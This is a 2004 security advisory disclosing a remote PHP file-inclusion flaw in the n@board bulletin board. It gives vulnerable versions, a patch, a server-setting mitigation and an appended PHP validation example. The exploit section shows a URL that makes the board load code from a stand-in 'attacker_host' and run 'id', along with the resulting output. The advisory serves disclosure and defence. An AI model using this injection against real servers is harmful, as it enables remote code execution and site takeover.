========================================
INetCop Security Advisory #2004-0x82-025
========================================

* Title: Naboard Remote PHP Injection exploit


0x01. Description

PHP Injection is one of the vulnerabilities that needs particular care in PHP programming.
Many bulletin boards and web solutions in South Korea are defeated by exactly this vulnerability.
The INetCop Security Team discovered the following naboard vulnerability.

skin/*/write.php
    ...
    ...
    ...

The $skin variable is the attack target.


0x02. Vulnerable Packages

Vendor site: http://navyism.com/

n@board 3.1.9 (KOR)
 -naboard319.zip
 +Unix
 +Linux
 +Other
n@board 3.1.9e (ENG)
 -naboard319english.zip
n@board 3.1.9j (JPN)
 -naboard_jpn319.zip
n@board 3.1.8cgb (CGB)
 -naboard318cgb.zip


0x03. Exploit

It can be exploited very simply.
Local files can be loaded, and specific PHP syntax can be executed so that it is used as a backdoor.

The following is an example of attempting the attack remotely.
After creating the following attack file on attacker_host under the file name write_form.php,

write_form.php:
--
--

http://naboard_host/skin/mac_gray/write.php?skin=http://attacker_host/&cmd=id

accessing this URL gives the following result.

Attack result:
--
uid=99(nobody) gid=99(nobody) groups=99(nobody)
Title Secret Memo
Warning: Failed opening 'http://attacker_host//write_attach.php' for inclusion (include_path='.:/usr/local/lib/php') in /usr/local/apache/htdocs/naboard/skin/mac_gray/write.php on line 69
--


0x04. Patch

The vulnerability can be blocked at the code level as follows. (Applies to all versions)

skin/*/write.php:
    ...
    // patch core
    if(eregi(":\/\/",$skin))
    {
        printf("\$skin error");
        exit;
    }
    ...

In addition, the PHP Injection vulnerability can be blocked in the server configuration.
Changing the allow_url_fopen setting in php.ini from 'On' to 'Off' keeps remote attackers out.

--
Thank you.

--
By "dong-houn yoU" (Xpl017Elz), in INetCop(c) Security.

MSN & E-mail: szoahc(at)hotmail(dot)com, xploit(at)hackermail(dot)com
INetCop Security Home: http://www.inetcop.org (Korean hacking game)
My World: http://x82.inetcop.org
GPG public key: http://x82.inetcop.org/h0me/pr0file/x82.k3y
--
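
The patch in 0x04 rejects only $skin values containing "://", while 0x03 also notes that local files can be loaded; the following added example (not code from the advisory or from n@board) validates $skin against the installed skin directories instead, which covers both cases. The helper name resolve_skin_file(), the skin root layout, and the assumption that write.php includes "<skin>/write_form.php" are hypothetical.

```php
<?php
// Added example, not n@board code. Assumes every skin is a directory directly
// under one skin root and that write.php includes "<skin>/write_form.php".

/**
 * Return the absolute path of a skin template, or null when $skin does not
 * name an installed skin. Hypothetical helper.
 */
function resolve_skin_file($skin, $file, $root)
{
    // 1. Accept only a plain directory name. This rejects "http://host/",
    //    "../" sequences, absolute paths and embedded NUL bytes in one step.
    //    preg_match() is used because eregi() was removed in PHP 7.0.
    if (!is_string($skin) || !preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $skin)) {
        return null;
    }
    // 2. The skin must actually be installed under the skin root.
    if (!is_dir($root . '/' . $skin)) {
        return null;
    }
    // 3. Canonicalise and confirm the file stays inside the root, so a
    //    symlinked skin directory cannot point somewhere else.
    $base = realpath($root);
    $path = realpath($root . '/' . $skin . '/' . $file);
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Self-check against a constructed skin tree in the temp directory.
$root = sys_get_temp_dir() . '/skin_demo_' . getmypid();
mkdir($root . '/mac_gray', 0700, true);
file_put_contents($root . '/mac_gray/write_form.php', "<?php // constructed stub\n");

// Constructed inputs: one installed skin, the remote value from 0x03,
// a relative path, an unknown skin name and an empty value.
$cases = array('mac_gray', 'http://attacker_host/', '../../tmp', 'no_such_skin', '');
foreach ($cases as $skin) {
    $path = resolve_skin_file($skin, 'write_form.php', $root);
    printf("%-26s => %s\n", var_export($skin, true),
           $path === null ? 'rejected' : 'accepted');
}

// Remove the constructed tree again.
unlink($root . '/mac_gray/write_form.php');
rmdir($root . '/mac_gray');
rmdir($root);
```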